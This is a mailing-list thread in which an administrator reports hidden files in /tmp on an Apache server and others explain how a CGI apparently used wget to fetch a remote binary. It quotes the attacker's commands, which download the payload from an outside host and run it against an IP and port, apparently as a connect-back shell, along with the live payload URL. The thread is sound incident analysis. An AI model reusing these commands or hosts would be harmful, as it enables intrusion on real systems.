Hi all, I have found something under /tmp: .do .do.sh --> ---- chmod 755 /tmp/.do /tmp/.do 163.17.51.8 9090 ----- ls -l shows: wwwrun nogroup ---- I have found in /var/log/httpd/error.log --09:06:43-- http://218.234.171.84/manual/.x/rhs => `/tmp/.do' Resolving 218.234.171.84... done. Connecting to 218.234.171.84:80... connected. HTTP request sent, awaiting response... 200 OK Length: 435,444 [text/plain] 0K .......... .......... .......... .......... .......... 11% 44.21 KB/s 50K .......... .......... .......... .......... .......... 23% 131.93 KB/s 100K .......... .......... .......... .......... .......... 35% 123.76 KB/s 150K .......... .......... .......... .......... .......... 47% 153.37 KB/s 200K .......... .......... .......... .......... .......... 58% 137.36 KB/s 250K .......... .......... .......... .......... .......... 70% 150.15 KB/s 300K .......... .......... .......... .......... .......... 82% 373.13 KB/s 350K .......... .......... .......... .......... .......... 94% 144.09 KB/s 400K .......... .......... ..... 100% 90.46 KB/s 09:06:47 (115.02 KB/s) - `/tmp/.do' saved [435444/435444] connect error ----- What's that? chkroot shows nothing, tripwire -"- ??? Gruss Tibor
On Tue, Jan 13, 2004 at 01:54:18PM +0100, Mátyás Tibor wrote:
I have found in /var/log/httpd/error.log
--09:06:43-- http://218.234.171.84/manual/.x/rhs => `/tmp/.do'
Some CGI at your webserver did run wget to receive some file from 218.234.171.84 and save it on your disc as "/tmp/.do". wwwrun:nogroup are standard user and group used for apache. The file is still avaiable from http://218.234.171.84/manual/.x/rhs I don't want to execute it, but strings does list some information: usage: %s <IP or hostname> <port> (/tmp/.do 163.17.51.8 9090)
connect error
probably a error message printed by /tmp/.do.
The server at 218.234.171.84 identifies itself as Apache/1.3.9 (Old!)
--
Stefan Tichy
Hi I found that server too, and some other "a-bit-worrying" stuff... For some reason my e-mail never reached this list.. wonder what happens this time. Jask.a
Some CGI at your webserver did run wget to receive some file from 218.234.171.84 and save it on your disc as "/tmp/.do". wwwrun:nogroup are standard user and group used for apache.
The file is still avaiable from http://218.234.171.84/manual/.x/rhs I don't want to execute it, but strings does list some information:
usage: %s <IP or hostname> <port>
(/tmp/.do 163.17.51.8 9090)
participants (3)
-
jaska
-
Mátyás Tibor
-
Stefan Andreas Tichy